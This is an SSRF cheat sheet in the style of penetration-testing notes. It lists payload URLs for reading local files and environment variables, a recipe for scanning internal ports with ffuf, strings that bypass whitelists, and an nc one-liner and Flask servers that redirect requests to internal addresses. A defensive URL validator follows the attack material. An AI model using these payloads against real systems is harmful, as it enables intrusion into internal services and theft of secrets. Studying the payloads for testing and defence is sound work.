SSRF
Server-Side Request Forgery.
It occurs when an application takes user-controlled input (URL, GET/POST parameter, header, etc.) without proper validation and uses it to make HTTP requests to another internal or external resource.
Types: In-Band (the response is returned to the attacker) and Blind (it is not).
Payload
Remote files
http://<TARGET>/load?q=http://<IP>:<PORT>
Local files
http://<TARGET>/load?q=file://<ABSOLUTE_PATH>
http://<TARGET>/load?q=file:///proc/self/environ # environment variables of the serving process, e.g. PWD
Port Scanning
for port in {1..65535};do echo $port >> ports.txt; done
curl -i -s "http://<TARGET_IP>/load?q=http://127.0.0.1:1"
# note the response length for a closed port; it becomes the -fs filter value below (30 here)
ffuf -w ./ports.txt:PORT -u "http://<TARGET_IP>/load?q=http://127.0.0.1:PORT" -fs 30
Encoding IP
http://127.0.0.1#@whitelist.net
http://127.0.0.1%23@whitelist.net
http://127.0.0.1%2523@whitelist.net
http://whitelist.net#@127.0.0.1
http://whitelist.net%23@127.0.0.1
http://whitelist.net%2523@127.0.0.1
HTTP Redirection
Server Redirection
echo -e "HTTP/1.1 302 Found\nLocation: <TARGET_SITE>\n" | nc -lnvp 80
from flask import Flask, redirect

app = Flask(__name__)

@app.route('/')
def redirect_to_new_page():
    # Plain 302 to the target, same as the nc one-liner above
    return redirect('<TARGET_SITE>', code=302)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)
from flask import Flask, redirect, make_response

app = Flask(__name__)

@app.route('/')
def index():
    # Create a response with a redirect and set the desired content type,
    # for fetchers that only check Content-Type before following the redirect.
    response = make_response(redirect('http://0.0.0.0/internal.php'))
    response.headers['Content-Type'] = 'image/png'
    return response

if __name__ == '__main__':
    app.run(debug=True)
DNS Rebinding
Set up a DNS server that constantly alternates between two IPs for the same name, so the validation step resolves to the public IP and the fetch step resolves to the internal one. With Rebinder, enter the two IPs to alternate between and use the domain it generates.
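The encoding, redirection and rebinding tricks above all target the same weak spot: validating the URL string instead of the address that is actually connected to. The following is an added defensive example, not code from the original notes: it rejects non-HTTP schemes, refuses userinfo (which removes the `#@` / `%23@` confusion class), resolves the host once, checks that the result is a public address, and returns that pinned IP for the actual connection. `FAKE_DNS`, `fake_resolver` and the hostnames `whitelist.net` / `rebind.example` are constructed so the demo runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

def is_public_ip(ip_text):
    # Rejects 127/8, 10/8, 169.254/16 (cloud metadata), ::1 and other reserved ranges
    ip = ipaddress.ip_address(ip_text)
    return ip.is_global and not ip.is_multicast

def check_outbound_url(url, resolver=socket.gethostbyname):
    """Return (ok, reason, pinned_ip) for a user-supplied fetch URL.
    Connect to pinned_ip (Host header = original hostname) instead of resolving
    again, so a rebinding DNS server cannot swap in 127.0.0.1 after the check.
    Re-run this on every redirect hop (disable automatic redirect following)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed (blocks file://, gopher://, ...)", None
    if parts.username is not None or parts.password is not None:
        # http://127.0.0.1%23@whitelist.net parses as userinfo "127.0.0.1%23";
        # refusing userinfo outright removes the whole '@' confusion class.
        return False, "userinfo in URL", None
    host = parts.hostname  # http://127.0.0.1#@whitelist.net -> "127.0.0.1"
    if not host:
        return False, "missing host", None
    try:
        ip = resolver(host)  # resolve exactly once and pin the answer
    except (socket.gaierror, OSError):
        return False, "unresolvable host", None
    if not is_public_ip(ip):
        return False, f"resolves to non-public address {ip}", None
    return True, "ok", ip

# Constructed lookup table (assumption, not real DNS) so the demo runs offline
FAKE_DNS = {"whitelist.net": "1.2.3.4", "rebind.example": "127.0.0.1"}

def fake_resolver(host):
    try:
        return str(ipaddress.ip_address(host))  # literal IPs resolve to themselves
    except ValueError:
        if host in FAKE_DNS:
            return FAKE_DNS[host]
        raise socket.gaierror(f"constructed resolver has no entry for {host}")

if __name__ == "__main__":
    for candidate in ("file:///proc/self/environ", "http://127.0.0.1#@whitelist.net",
                      "http://whitelist.net%23@127.0.0.1", "http://rebind.example/",
                      "http://whitelist.net/logo.png"):
        print(candidate, "->", check_outbound_url(candidate, resolver=fake_resolver))
```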
Inconsistencies on URL Parser